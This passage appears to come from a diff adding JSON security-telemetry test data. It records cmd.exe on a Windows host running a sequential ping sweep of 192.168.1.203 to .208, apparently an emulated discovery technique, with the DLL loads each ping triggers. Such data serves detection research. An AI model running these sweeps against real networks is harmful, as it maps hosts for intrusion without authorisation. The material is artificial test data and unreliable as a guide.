"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572977140000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572977140000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572977140000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572977140000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572977140000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572977140000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572977140000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572977140000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572977140000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" + }, + { + "event_type": "process", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572981830000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.203", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7876, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572981980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572981980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572981980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572981980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572981980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572981980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572981980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572981980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572981980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572981980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572981980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572981980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" + }, + { + "event_type": "process", + "pid": 7876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572986840000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-001078895301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.204", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6064, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572986980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6064, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572986980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6064, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572986980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6064, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572986980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6064, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572986980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6064, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572986980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6064, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572986980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6064, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572986980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6064, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572986980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6064, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572986980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6064, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572986980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6064, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572986980000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" + }, + { + "event_type": "process", + "pid": 6064, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572991990000, + "unique_pid": "{42FC7E13-CBB2-5C05-0000-0010E88B5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.205", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7704, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572992140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7704, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572992140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7704, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572992140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7704, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572992140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7704, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572992140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7704, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572992140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7704, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572992140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7704, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572992140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7704, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572992140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7704, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572992140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7704, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572992140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7704, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572992140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" + }, + { + "event_type": "process", + "pid": 7704, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572996990000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010658E5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.206", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1732, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572997130000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1732, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572996990000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1732, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572997140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1732, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572997140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1732, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572997140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1732, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572997140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1732, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572997140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1732, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572997140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1732, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572997140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1732, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572997140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1732, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572997140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1732, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572997140000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" + }, + { + "event_type": "registry", + "pid": 2712, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", + "registry_value": "VFUProvider", + "timestamp": 131883573000270000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" + }, + { + "event_type": "registry", + "pid": 2712, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider\\StartTime", + "registry_value": "StartTime", + "timestamp": 131883573000270000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" + }, + { + "event_type": "process", + "pid": 1732, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573001830000, + "unique_pid": "{42FC7E13-CBB3-5C05-0000-0010DA905301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.207", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3440, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573001980000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3440, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573001980000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3440, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573001980000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3440, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573001980000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3440, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573001980000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3440, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573001980000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3440, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573001980000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3440, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573001980000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3440, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573001980000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3440, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573001980000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3440, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573001980000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3440, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573001980000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" + }, + { + "event_type": "process", + "pid": 3440, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573006990000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-0010AE935301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.208", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7504, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573007140000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573007140000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573007140000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573007140000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573007140000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573007140000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573007140000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573007140000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573007140000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573007140000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573007140000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": 